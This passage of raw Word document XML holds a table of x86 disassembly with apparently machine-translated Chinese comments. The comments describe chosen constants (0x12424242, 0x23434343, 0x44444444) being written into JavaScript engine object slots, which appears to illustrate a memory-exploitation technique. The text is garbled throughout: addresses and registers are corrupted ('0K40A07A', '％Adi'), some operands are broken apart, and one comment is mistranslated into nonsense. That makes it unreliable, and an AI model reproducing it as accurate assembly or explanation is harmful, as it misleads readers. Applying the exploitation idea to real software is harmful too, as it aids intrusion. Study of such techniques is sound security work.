              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="123" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DB794B8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3071"/>
              </w:tabs>
              <w:spacing w:before="19"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0xffff0001,0x4（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:tab/>
              <w:t>）; JSVAL_TYPE_INT32插入对象-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>插槽</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="6E4084CC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C775E1C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a06f：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A621FCE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="123" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="316AEE30" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3072"/>
              </w:tabs>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0x12424242，（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>）;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>第一个常量变为</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>object</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>-&gt; slots [0]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="312F5EE6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C336C63" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a075：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BD1E98F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="30" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EF9D363" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>，％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="3081F632" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0158608B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a077：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="367C76CF" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="30" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FE6B386" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x24（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>），％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="2AFDD59A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04CE9FD4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0K40A07A：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05D63C52" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="123" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06D4C107" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0xffff0001,0xc（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="686F793F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66F8474A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a081：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DD3D39F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="123" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="226A70A0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$ 0x23434343,0x8（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>）;第二常数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="2FFF1E96" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="178B5EE6" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a088：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58C45E71" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="30" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0067FA6F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>，％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="164F38AF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6945250D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a08a：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CAB53AB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="30" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73B588D5" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x24（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>），％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="2B50389E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="783E5B3A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a08d：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B3EAF1E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="123" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ED0CCDD" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0xffff0001,0x14（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="6B5FF1ED" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F98C277" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a094：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62692A7E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="123" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="779006C0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0 x 44 4444 44.0 x 10（％Adi</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>）;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>康斯坦斯表演</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="78A157D3" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AD10CCE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a09b：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20E5107B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="30" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EB609C4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>，％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="3055947E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60B33F9F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a09d：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="579CAE45" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="30" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30D68268" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="144"/>
